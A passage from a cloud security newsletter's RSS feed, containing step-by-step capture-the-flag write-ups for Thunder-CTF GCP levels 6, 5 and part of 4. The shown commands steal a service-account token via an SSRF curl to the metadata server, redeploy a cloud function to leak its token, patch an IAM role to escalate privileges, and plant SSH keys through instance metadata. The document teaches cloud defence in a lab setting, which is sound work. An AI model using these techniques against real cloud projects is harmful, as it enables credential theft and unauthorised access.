src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3656682b-e6ba-4f62-8554-b5afb458407e/image-12.png?t=1731226643"/></div><p class="paragraph" style="text-align:left;">It has a Python application inside; we’ll analyze it.</p><div class="codeblock"><pre><code>cat app.py</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/b82f2d38-693e-4291-ae20-4483decfc331/image-13.png?t=1731226664"/></div><p class="paragraph" style="text-align:left;">This Python application has a suspiciously unusual URL route that returns the compute instance’s metadata URL.</p><p class="paragraph" style="text-align:left;">If the same container is running on the compute instance, it must expose this endpoint. If it does, it will also respond with the access token of the <a class="link" href="https://cloud.google.com/compute/docs/access/service-accounts?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-06" target="_blank" rel="noopener noreferrer nofollow">instance’s service account</a>.</p><p class="paragraph" style="text-align:left;">Let’s try accessing the URL along with the public IP of the instance:</p><div class="codeblock"><pre><code>curl &lt;external-ip-of-instance&gt;/admin-proxy-aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/83fdebf1-a6c6-4594-bdf7-eb16ff4c10b8/image-14.png?t=1731226719"/></div><p class="paragraph" style="text-align:left;">Now that we have the compute instance’s access token, we will try to list the permissions related to it.</p><div class="codeblock"><pre><code>python scripts/test-permissions.py &lt;access-token&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/ef11b8ee-24c4-42b1-a26e-16295f17406d/image-15.png?t=1731226751"/></div><p class="paragraph" style="text-align:left;">We can see that only <code>storage.objects.get</code> permission is associated with this access token.</p><p class="paragraph" style="text-align:left;">Finally, download the <code>secret.txt</code> object in the storage bucket by passing the compute instance’s access token.</p><div class="codeblock"><pre><code>https://www.googleapis.com/storage/v1/b/&lt;bucket-name&gt;/o/secret.txt?alt=media</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/373437bb-bac9-4ff0-bef0-ad91b65f3c78/image-16.png?t=1731226803"/></div><p class="paragraph" style="text-align:left;">We got the secret value from the <code>secret.txt</code> file.</p><p class="paragraph" style="text-align:left;">This marks the end of Thunder-CTF’s level-6.</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=be9717bc-a8f9-4f36-9141-5b977dce831f&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving Thunder-CTF: Level 05</title>
  <description>Step-by-step guide to solving Thunder CTF Level 5. Build your GCP skills with practical cloud security techniques and solutions.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/03f47555-3afe-469f-a460-11aef1809c6d/Thunder_CTF_05_Cover.jpg" length="18812" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-thunder-ctf-level-5</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-thunder-ctf-level-5</guid>
  <pubDate>Thu, 23 May 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-05-23T18:30:00Z</atom:published>
    <dc:creator>Sarthak Bokade</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Gcp]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">Have you checked my writeup for previous levels? If not, here are the links:</p><ul><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-1?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 01</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-2?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 02</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-3?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 03</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-4?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 04</a></p></li></ul><p class="paragraph" style="text-align:left;">Starting <a class="link" href="https://thunder-ctf.cloud/thunder/a5power.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">level-5</a> of Thunder-CTF:</p><div class="codeblock"><pre><code>python3 thunder.py create thunder/a5power</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6d67fcde-dcf4-4cf4-8448-a31d7183265c/image-1.png?t=1731225414"/></div><p class="paragraph" style="text-align:left;">First, we will check the permissions associated with the service account</p><div class="codeblock"><pre><code>python scripts/test-permissions.py start/a5-access.json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/97d53a40-3b63-45e3-8cad-4b1e038c27cd/image-2.png?t=1731225426"/></div><p class="paragraph" style="text-align:left;">This service account has many permissions for the cloud function service—listing, describing, updating, etc.</p><p class="paragraph" style="text-align:left;">We will now list the cloud functions:</p><div class="codeblock"><pre><code>gcloud functions list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/cc358281-a773-4a30-a014-9d40ed4fe7e1/image-3.png?t=1731225437"/></div><p class="paragraph" style="text-align:left;">Since the cloud function is active, we will describe it</p><div class="codeblock"><pre><code>gcloud functions describe a5-func-366435738976</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/42872179-43a8-4455-8114-b7101647b776/image-4.png?t=1731225448"/></div><p class="paragraph" style="text-align:left;">In this description, we can see the URL of the HTTPS trigger. We will try to trigger this cloud function using the given URL:</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4d0013fc-d8d6-4ca3-8fb4-c0ef76e93075/image-5.png?t=1731225462"/></div><p class="paragraph" style="text-align:left;">We can see that it’s giving a 403 forbidden error, saying the client doesn’t have permission. We have to pass the authorization token with the request.</p><p class="paragraph" style="text-align:left;">Let’s try hitting the function with our service account’s identity token</p><div class="codeblock"><pre><code>gcloud auth print-identity-token</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/0097386e-4be0-4992-aa1f-73d07d785544/image-6.png?t=1731225474"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e9f422ca-c23b-4937-aceb-83c836dd0f3b/image-7.png?t=1731225486"/></div><p class="paragraph" style="text-align:left;">The output is just “<b>Hello World!</b>“. Not of much use. We’ll investigate further.</p><p class="paragraph" style="text-align:left;">We have another URL that contains the source code, but since this user doesn’t have the <code>cloudfunctions.functions.sourceCodeGet</code>, we can’t get the source code. But it has the permission to set the source code <code>cloudfunctions.functions.sourceCodeSet</code>.</p><p class="paragraph" style="text-align:left;">We’ll use that permission to <a class="link" href="https://cloud.google.com/functions/docs/writing/write-http-functions?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">modify the source code of the cloud function</a>.</p><p class="paragraph" style="text-align:left;">Cloud functions have a <a class="link" href="https://cloud.google.com/functions/docs/securing/function-identity?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">runtime service account attached</a>. This service account’s permissions can differ from those of the identities deploying or invoking the function.</p><p class="paragraph" style="text-align:left;">Let’s modify the cloud function’s code to return the access token when invoked. We will add a Python script that returns the cloud function’s access code when invoked from an HTTP URL.</p><div class="codeblock"><pre><code>mkdir code_modif
nano code_modif/main.py
nano code_modif/requirements.txt</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2218fc22-7f67-4f30-a69b-06ab17f35dc2/image-8.png?t=1731225498"/></div><p class="paragraph" style="text-align:left;">Using the nano editor, we have added the code to get the access token corresponding to the cloud function</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e8f7a242-6988-4138-83d5-7b0f1e8f2827/image-9.png?t=1731225510"/></div><p class="paragraph" style="text-align:left;">In <code>requirements.txt</code>, we added the requests library as a dependency and deploy.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e5115680-2429-4c60-b0d2-d31ca02f1ac6/image-10.png?t=1731225521"/></div><p class="paragraph" style="text-align:left;">Now we will deploy the modified code</p><div class="codeblock"><pre><code>gcloud functions deploy a5-func-366435738976 --source=./code_modif/ --trigger-http</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7df4684e-c6a0-4782-8b81-82481911a654/image-11.png?t=1731225538"/></div><p class="paragraph" style="text-align:left;">We updated our cloud function with custom code. Now, we can send requests to the HTTP URL to invoke the function, which will run the updated code.</p><p class="paragraph" style="text-align:left;">Again, call the cloud function using the HTTPS URL by passing the service account’s identity token with it.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/5017759e-23d5-4368-bd08-5ce0de3355ff/image-12.png?t=1731225571"/></div><p class="paragraph" style="text-align:left;">We can see the cloud function’s access token. Now, we will check for its permission, which we got as the output.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4723e5c9-9497-4c31-ba38-00e87081f6ad/image-13.png?t=1731225584"/></div><p class="paragraph" style="text-align:left;">These are the permissions related to the cloud function, which differs from the service account’s permissions.</p><p class="paragraph" style="text-align:left;">Now we can see that this cloud function’s access token has permission for <code>iam.roles.get</code>, <code>iam.roles.list</code>, and <code>iam.roles.update</code>. We will use these permissions to grant our service account access to the private storage bucket. (Remember, the challenge description told us the secret is in a private storage bucket?)</p><p class="paragraph" style="text-align:left;">We can <a class="link" href="https://cloud.google.com/resource-manager/reference/rest/v1/projects/getIamPolicy?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">get the list of IAM policies</a> by making a POST request to this URL <code>https://cloudresourcemanager.googleapis.com/v1/projects/&#123;resource&#125;:getIamPolicy</code>, by setting the cloud function’s access token as the bearer token.</p><div class="codeblock"><pre><code>https://cloudresourcemanager.googleapis.com/v1/projects/&#123;resource&#125;:getIamPolicy</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/89c3fadf-1509-497a-8377-33b4e6d79ce7/image-14.png?t=1731225602"/></div><p class="paragraph" style="text-align:left;">We can see a list of IAM policies associated with the project <code>cloudsecurityclub-dev</code>. We’ll check the policies for the given service account and try modifying it to access the storage bucket. (<code>.list</code> and <code>.get</code> permission)</p><p class="paragraph" style="text-align:left;">The following role is associated with our service account.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a09aa180-b875-4d2e-a005-3ebdb63a1353/image-15.png?t=1731225614"/></div><p class="paragraph" style="text-align:left;">We can check the service account name by running this command:</p><div class="codeblock"><pre><code>gcloud auth list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/daa92238-e26f-4588-9dfa-7b9ac423cdf6/image-16.png?t=1731225626"/></div><p class="paragraph" style="text-align:left;">We can see the service account is <code>a5-access@cloudsecurityclub-dev.iam.gserviceaccount.com</code></p><p class="paragraph" style="text-align:left;">We can bind new roles to a service account with a POST request, but we need a PATCH request to modify an existing role instead.</p><p class="paragraph" style="text-align:left;">So, we’ll use the PATCH request to update the roles associated with the service account.</p><p class="paragraph" style="text-align:left;">PATCH request on this URL:</p><div class="codeblock"><pre><code>https://iam.googleapis.com/v1/projects/cloudsecurityclub-dev/roles/a5_access_role_366435738976?updateMask=includedPermissions</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/09d4e205-4bbb-4dd6-b142-e9e61dc77f9c/image-17.png?t=1731225641"/></div><p class="paragraph" style="text-align:left;">We received the 200 OK status code, so the service account’s permissions are updated.</p><p class="paragraph" style="text-align:left;">Now, we will try to list the private buckets</p><div class="codeblock"><pre><code>gsutil ls</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/19f5cdd5-5c0f-4141-aa83-c905cdf542eb/image-18.png?t=1731225658"/></div><p class="paragraph" style="text-align:left;">We can now see the bucket and will list the contents of it</p><div class="codeblock"><pre><code>gsutil ls gs://a5-bucket-366435738976/</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e3a290f7-cb66-4e5d-a95a-8a20d44e2099/image-19.png?t=1731225671"/></div><p class="paragraph" style="text-align:left;">We will copy the contents of the bucket in the root directory.</p><div class="codeblock"><pre><code>gsutil cp -r gs://a5-bucket-366435738976 .</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/28af1f29-23d0-41ad-b711-3825387a8558/image-20.png?t=1731225683"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f95954e6-78b5-436e-b5ff-bd9576301113/image-21.png?t=1731225696"/></div><p class="paragraph" style="text-align:left;">We can see <code>secrets.txt</code> there, which is what we wanted to find.</p><p class="paragraph" style="text-align:left;">Let’s look at the contents of this file:</p><div class="codeblock"><pre><code>cat secret.txt</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/40592a26-e1c1-4962-98dc-db5ed0761b96/image-22.png?t=1731225707"/></div><p class="paragraph" style="text-align:left;">And we finally got our secret value.</p><p class="paragraph" style="text-align:left;">This marks the end of Thunder-CTF’s level-5. </p><p class="paragraph" style="text-align:left;">If you want to read more about GCP misconfigurations, check out <a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-6?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-05" target="_blank" rel="noopener noreferrer nofollow">Thunder CTF Level 6 write-up</a>!</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=853ab1ad-c721-4761-8acf-7fc4d221e012&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving Thunder-CTF: Level 04</title>
  <description>Step-by-step guide to solving Thunder CTF Level 4. Build your GCP skills with practical cloud security techniques and solutions.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/63a406b6-78e9-4a66-b71b-fbc02c7f4153/Thunder_CTF_04_Cover.jpg" length="18595" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-thunder-ctf-level-4</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-thunder-ctf-level-4</guid>
  <pubDate>Wed, 22 May 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-05-22T18:30:00Z</atom:published>
    <dc:creator>Sarthak Bokade</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Gcp]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">Have you checked my writeup for previous levels? If not, here are the links:</p><ul><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-1?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 01</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-2?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 02</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="https://cloudsecurity.club/p/solving-thunder-ctf-level-3?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04" target="_blank" rel="noopener noreferrer nofollow">Solving Thunder CTF: Level 03</a></p></li></ul><p class="paragraph" style="text-align:left;">Let’s get started with <a class="link" href="https://thunder-ctf.cloud/thunder/a4error.html?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04" target="_blank" rel="noopener noreferrer nofollow">level 4</a>: </p><div class="codeblock"><pre><code>python3 thunder.py create thunder/a4error</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1c048216-f7f9-48ca-9e13-e500cae2a6fa/image-1.png?t=1731222475"/></div><div class="codeblock"><pre><code>gcloud auth activate-service-account --key-file=start/a4-access.json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/132c6d57-41db-4177-b0c5-d2cfd1d93f92/image-2.png?t=1731222487"/></div><p class="paragraph" style="text-align:left;">We will first look into the permissions of the service account related to the level-4 challenge.</p><div class="codeblock"><pre><code>python scripts/test-permissions.py start/a4-access.json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/bb314fed-906d-4c21-a42b-87d1c43db096/image-3.png?t=1731222843"/></div><p class="paragraph" style="text-align:left;">The service account has diverse permissions for the <b>cloud logging</b>, <b>cloud functions</b>, and <b>compute instances</b>.</p><p class="paragraph" style="text-align:left;">We’ll explore them one by one.</p><p class="paragraph" style="text-align:left;">Firstly, we’ll find the running compute instance.</p><div class="codeblock"><pre><code>gcloud compute instances list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/00e31778-28af-49a6-8382-96e35f9c553c/image-4.png?t=1731222514"/></div><p class="paragraph" style="text-align:left;">Next, we’ll describe this instance as the user has “compute.instances.get” permission, which will help us analyze it better.</p><div class="codeblock"><pre><code>gcloud compute instances describe a4-instance --zone-us-west1-b</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/c17aafba-d1d7-46cf-9d96-1db7115347e8/image-5.png?t=1731222527"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/0b96c44e-63b7-4a8f-abc8-80d9d3500506/image-6.png?t=1731222540"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/60b8d823-4483-412a-b198-cdd085793611/image-7.png?t=1731222552"/></div><p class="paragraph" style="text-align:left;">We can’t find any potential leads from this information, but we will try to find the clues to get into the compute instance</p><p class="paragraph" style="text-align:left;">Next, we’ll explore cloud functions:</p><div class="codeblock"><pre><code>gcloud functions list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2441b377-3373-4ea6-9fbd-2f7b992b04fb/image-8.png?t=1731222567"/></div><p class="paragraph" style="text-align:left;">We can see a cloud function running, but the service account doesn’t have permission to describe this cloud function (as you can see, <code>cloudfunctions.functions.get</code> permission is missing)</p><p class="paragraph" style="text-align:left;">However, one thing to note is that it has an HTTP trigger, so we can invoke this cloud function using HTTP requests.</p><p class="paragraph" style="text-align:left;">We must form the <a class="link" href="https://cloud.google.com/functions/docs/calling/http?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04#url" target="_blank" rel="noopener noreferrer nofollow">HTTP URL using the following URL format</a> to invoke the cloud function.</p><div class="codeblock"><pre><code>https://REGION-PROJECT_ID.cloudfunctions.net/FUNCTION_NAME</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a2cd54d0-80df-4a92-b73c-b1dfbd8796bd/image-9.png?t=1731222580"/></div><p class="paragraph" style="text-align:left;">The permissions of our service account a4-access didn’t have the permission <code>cloudfunctions.functions.invoke</code>. So, it can’t invoke all cloud functions in the account. However, there’s a slight possibility that this service account was explicitly granted the invoke permission from the function level (with the help of <a class="link" href="http://add-iam-policy-binding/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04" target="_blank" rel="noopener noreferrer nofollow">cloud function level IAM Policy Bindings</a>).</p><p class="paragraph" style="text-align:left;">Let’s try to invoke the cloud function by passing our service account’s identity token. (We can generate it using the command: <code>gcloud auth print-identity-token</code>)</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/77de1110-2b90-49ee-b1ad-3e14ee3187df/image-10.png?t=1731222594"/></div><p class="paragraph" style="text-align:left;">I am passing this newly generated identity token to ensure authentication.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/54d495a6-f811-4c92-96ff-4f500298ba74/image-11.png?t=1731222608"/></div><p class="paragraph" style="text-align:left;">It worked. The cloud function has explicitly granted invoke access to our service account. Since this function takes another argument, the file, we’ll try to provide a dummy value for the argument and curl the URL again.</p><div class="codeblock"><pre><code>https://REGION-PROJECT_ID.cloudfunctions.net/FUNCTION_NAME?file=hello2.txt</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d4f9d0fd-f5c3-454a-90e5-c60a97d64cb3/image-12.png?t=1731222628"/></div><p class="paragraph" style="text-align:left;">It gave the error because there was no file like <code>hello2.txt</code> in the cloud function.</p><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE:</b> The cloud function has an underlying logging functionality that notes all the errors and log entries by default. We will explore this to get more information about the error and check if it leads to another clue to proceed further.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">Also, as said, this specific user has a lot of permissions associated with the cloud logging service. We will explore them now.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/fab9d873-c18e-49db-bd1d-c3c0859d0c12/image-13.png?t=1731222644"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/05cd99c8-34ff-4532-a324-c3f7ac2dec08/image-14.png?t=1731222659"/></div><p class="paragraph" style="text-align:left;">We see a bearer token is present in the logs. This token differs from the identity token we passed to the cloud function.</p><p class="paragraph" style="text-align:left;">Let’s try to find out how much access this hardcoded token has.</p><p class="paragraph" style="text-align:left;">We will again run the <code>test_permission.py</code> script with the hardcoded token from logs to get the permissions associated with this access token.</p><div class="codeblock"><pre><code>python scripts/test-permissions.py &lt;bearer_token&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/930e6c1d-2afe-439b-b0e0-1307a7a8c3c9/image-15.png?t=1731222673"/></div><p class="paragraph" style="text-align:left;">We can see that this access token has the permission to <code>compute.instances.setMetadata</code>. Our main aim was to get access to the compute instance running so that we could search for the secret inside the instance.</p><p class="paragraph" style="text-align:left;">We will <a class="link" href="https://cloud.google.com/compute/docs/metadata/setting-custom-metadata?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04#gcloud" target="_blank" rel="noopener noreferrer nofollow">update the compute instance metadata</a> to get into the VM. We can set the ssh_key parameter in the metadata of the compute instance so that we can try to access it by logging into it using SSH</p><p class="paragraph" style="text-align:left;">Firstly, we will <a class="link" href="https://devopscube.com/generate-ssh-key-pair/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-thunder-ctf-level-04" target="_blank" rel="noopener noreferrer nofollow">generate temporary SSH keys</a> using the command:</p><div class="codeblock"><pre><code>ssh-keygen -t rsa -b 4096</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6fe3a7c7-426c-4515-8729-4270ef89ce3a/image-16.png?t=1731222689"/></div><p class="paragraph" style="text-align:left;">Then set the key name to <code>ssh_key_level4</code></p><p class="paragraph" style="text-align:left;">It will generate private and public keys, respectively</p><p class="paragraph" style="text-align:left;">We can see public and private keys got created:</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e585b602-c453-4b01-ba05-234a32645085/image-17.png?t=1731222708"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/42a2f334-a366-4eff-8782-ffb0c188b822/image-18.png?t=1731222723"/></div><p class="paragraph" style="text-align:left;">Now, we will add the public key of this generated SSH key to the metadata of the compute instance</p><p class="paragraph" style="text-align:left;">To add the custom metadata to the compute instance, we need to input the fingerprint value of the instance also (which we can refer to the compute instance details when we describe 